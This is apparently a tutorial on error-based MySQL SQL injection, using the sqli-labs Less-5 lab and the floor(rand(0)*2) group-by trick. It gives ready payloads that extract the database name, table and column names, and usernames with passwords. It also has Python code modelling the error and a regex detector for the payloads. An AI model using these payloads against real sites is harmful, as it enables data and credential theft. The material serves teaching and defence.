
What is the blind injection method of MySQL GET based on error reporting?

2025-01-16 Update From: SLTechnology News&Howtos

Shulou(Shulou.com) 06/01

This article explains the MySQL GET blind injection method based on error reporting.

Error injection

Error injection means that the hacker makes judgments from the error messages echoed back during the injection process. Formally, there are two nested queries, that is, select ... (select ...). The inner select is called a subquery; the subquery is executed first, and then the outer select. Double injection mainly involves the following SQL functions:

rand(): random function, returns a value between 0 and 1

floor(a): returns the integer that is less than or equal to a and closest to a

count(): aggregate function, also known as the counting function, returns the total number of query objects

group by clause: grouping statement, groups according to the query results

Specific information is displayed through the error report. If rand() is used in the query, its value is calculated multiple times. With group by, floor(rand(0)*2) is executed once, and if no matching record exists in the virtual table, it is executed again when the row is inserted into the virtual table. Less-5 is used as the example to demonstrate.

First use error injection. Construction statement:

1' union select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+

Display the results

This happens because when an aggregate function such as count() is followed by a grouping statement, part of the query result is displayed in the form of an error.

So, learn about the functions in this statement (that is, the four functions above). Connect to the database locally and run queries, starting with a test of concat().

Input: select concat('qwe','abc');

qwe and abc are stitched together.

Then test the random function rand():

Input statement: select rand();

Over a total of three inputs, each output is random, but the numbers are all greater than 0 and less than 1.

Then test the floor() function:

Input statement: select floor(1.2343232); select floor(3.893);

The output is the integer that is less than or equal to the input.

Then test the combination of double injection queries

Input statement: select floor(rand()*2);

Analyzing from the inside out: rand()*2 can never be equal to 2 and can never be less than 0, so after floor rounding the result is 1 or 0.

Take a closer look and test:

select concat((select database()),floor(rand()*2));

concat joins the database name with the rounded value that follows it. Similarly, in the first error statement in Less-5: concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2)) a

0x3a is the ':' character, so they are all joined together.

If you add from emails at the end, the returned result is a set of security0 and security1 values. How many entries there are depends on how many columns there are in the table.

Next, add the group by statement.

select concat((select database()),floor(rand()*2)) as a from information_schema.tables group by a;

as a gives the expression concat((select database()),floor(rand()*2)) the alias a, and group by a then groups on it. So identical security0 and security1 values fall into the same group, that is, two groups, and there are two results.

Then we add the aggregate function count (*)

select count(*),concat((select database()),floor(rand(0)*2)) as a from information_schema.tables group by a;
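Why this statement fails with a duplicate-key error can be reproduced offline. The following Python model is an added example, not part of the original article: mysql_rand is modelled on MySQL's seeded RAND() generator, group_by_count is a simplified model of the virtual-table lookup and insert described above, and all function names are made up for this illustration.

```python
# Added illustration, not from the original article.
MAX_VALUE = 0x3FFFFFFF  # modulus of MySQL's seeded RAND() generator


def mysql_rand(seed):
    """Yield the values RAND(seed) produces, one per evaluation."""
    seed1 = ((seed * 0x10001 + 55555555) & 0xFFFFFFFF) % MAX_VALUE
    seed2 = ((seed * 0x10000001) & 0xFFFFFFFF) % MAX_VALUE
    while True:
        seed1 = (seed1 * 3 + seed2) % MAX_VALUE
        seed2 = (seed1 + seed2 + 33) % MAX_VALUE
        yield seed1 / MAX_VALUE


def floor_rand_bits(seed, n):
    """First n values of floor(rand(seed)*2)."""
    gen = mysql_rand(seed)
    return [int(next(gen) * 2) for _ in range(n)]


def group_by_count(prefix, rows, seed=0):
    """Model of: select count(*), concat(prefix, floor(rand(seed)*2)) a
    from <table with `rows` rows> group by a
    Returns ("ok", counts) or ("duplicate", key, row_number)."""
    gen = mysql_rand(seed)

    def key():
        return f"{prefix}{int(next(gen) * 2)}"

    counts = {}  # the virtual table: group key -> count(*)
    for row in range(1, rows + 1):
        probe = key()            # first evaluation: look the key up
        if probe in counts:
            counts[probe] += 1
            continue
        inserted = key()         # second evaluation: value actually inserted
        if inserted in counts:   # unique key on the group column is violated
            return ("duplicate", inserted, row)
        counts[inserted] = 1
    return ("ok", counts)


if __name__ == "__main__":
    print(floor_rand_bits(0, 6))
    print(group_by_count("security", 3))
    print(group_by_count("security", 2))
```

With the fixed seed 0 the sequence is the same on every run, so in this model the collision always appears on the third row and a table with fewer than three rows produces no error.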

By the same token, less-5 first reported an error:

Reference tutorial

1. Expose the database

Construction statement:

1' union select 1,2,3 from (select count(*),concat((select concat(0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a)),floor(rand(0)*2))x from information_schema.tables group by x)a--+

The page shows:

2. Expose the tables

Construction statement:

1' union select 1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a--+

3. Reveal the column name

Construction statement:

1' union select 1,2,3 from (select count(*),concat((select concat(column_name,0x3a,0x3a) from information_schema.columns where table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a--+

4. Get user information

Construction statement:

1' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a--+
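From the defender's side, every statement in this walkthrough combines the same building blocks: count(*), group by and floor(rand(...)*2). The following Python check is an added example, not part of the original article; it flags URL query strings that carry all three, and the sample query strings and function names are constructed for this illustration.

```python
# Added illustration, not from the original article.
import re
from urllib.parse import unquote_plus

# Building blocks of the statements on this page, tolerant of extra spaces.
SIGNALS = {
    "floor_rand": re.compile(r"floor\s*\(\s*rand\s*\([^)]*\)\s*\*\s*2\s*\)", re.I),
    "count_star": re.compile(r"count\s*\(\s*\*\s*\)", re.I),
    "group_by": re.compile(r"\bgroup\s+by\b", re.I),
    "info_schema": re.compile(r"\binformation_schema\b", re.I),
}
REQUIRED = {"floor_rand", "count_star", "group_by"}

# Constructed sample query strings (not real traffic).
SAMPLE_QUERIES = [
    "id=1",
    "id=1%27+union+select+1,count(*),concat(0x3a,0x3a,(select+user()),"
    "0x3a,0x3a,floor(rand(0)*2))a+from+information_schema.columns+group+by+a--+",
    "q=how+to+use+group+by+with+count(*)",
    "id=1%27%20UNION%20SELECT%201,COUNT%20(*),CONCAT(DATABASE(),"
    "FLOOR%20(RAND%20(0)%20*%202))x%20FROM%20information_schema.tables"
    "%20GROUP%20BY%20x%23",
]


def signals_in(raw_query):
    """Return the sorted names of the signals found in one query string."""
    text = unquote_plus(raw_query)  # undo URL encoding before matching
    return sorted(name for name, rx in SIGNALS.items() if rx.search(text))


def flag_requests(queries):
    """Return (query, signals) for requests carrying the full pattern."""
    flagged = []
    for query in queries:
        hits = signals_in(query)
        if REQUIRED.issubset(hits):
            flagged.append((query, hits))
    return flagged


if __name__ == "__main__":
    for query, hits in flag_requests(SAMPLE_QUERIES):
        print(hits, query[:60])
```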
